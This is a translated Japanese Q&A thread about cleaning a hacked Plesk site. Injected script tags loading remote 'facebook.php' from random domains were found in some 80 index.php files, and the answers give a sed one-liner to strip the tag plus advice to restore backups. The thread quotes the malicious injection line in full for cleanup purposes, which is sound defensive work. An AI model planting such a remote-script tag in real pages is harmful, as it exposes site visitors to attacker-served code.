2

残念ながら、Linux Plesk サーバー上のハッキングされたサイトに再び対処しています。問題は FTP アクセスを変更することで修正されますが (PC での有名な Filezilla FTP コードのハッキングに行き着きました)、サイトを最新のバックアップに復元するのに 1 時間以上かかる場合があるため、ファイルの編集方法を教えていただければ幸いです。より迅速にオンラインに戻すことができてうれしく思います。ハッキングはかなり単純です。サイト内の多数の index* ファイル (index.php のみのようです) に JavaScript コードが挿入されました。ハッキングされたファイルを大量編集する方法を探しています。ターゲットとなる JavaScript コードは同じですが、ハッキングされた可能性のある多くのサイトから呼び出されることを知っています。だから私の正当なインデックスファイルは

<?php

それは今のように始まります

<script type="text/javascript" src="http://(RANDOMDOMAINHERE)/facebook.php"></script><?php

そのチェーンには変数が含まれているため、変更されたすべてのインデックス ファイル (約 80 個が見つかりました) を確実に編集する方法を見つけるのを手伝ってくれませんか? 以前に SED 置換を使用したことがありますが、今回は置換するチェーンの一部が異なるため、ワイルドカードを使用できますか? 光を放ってくれてありがとう!

4

3 に答える 3

3
find -name 'index.php' -print0 |
    xargs -0 sed -i '1s#^<script type="text/javascript" src="http://.*\?/facebook.php"></script>##g'

不思議なことをする必要があります

sedコマンド:

  • 1 (最初の行で一致)
  • s#pattern#replacement#g(パターンを置換で置き換えます。後者が空ではありません)
  • ^行頭で一致する必要があります
  • .*\?任意の長さの文字シーケンスを受け入れます。ただし、パターン全体に対して複数の一致を行うことができる場合は、可能な限り短いバリアントのみを一致させてください。

乾杯

于 2011-04-21T22:39:39.683 に答える
1

実際に運用ドメインを管理していないことを心から願っています。ユーザーに通知し、問題を修正してもらい、問題のない最近のバックアップに戻るようユーザーに提案する必要があります。

他に何が改ざんされているかはわかりません。

VPS が別の場所にあることを嬉しく思います。

于 2011-04-21T22:11:06.060 に答える
-1

この問題に対処する前に、クロス サイド スクリプティングのエクスプロイトを修正します。そうしないと、すべてが無駄になります。それが完了したら、共通の文字列を含むスクリプトのブロックを単純に検索して置換するだけで十分です。

于 2011-04-21T22:09:54.337 に答える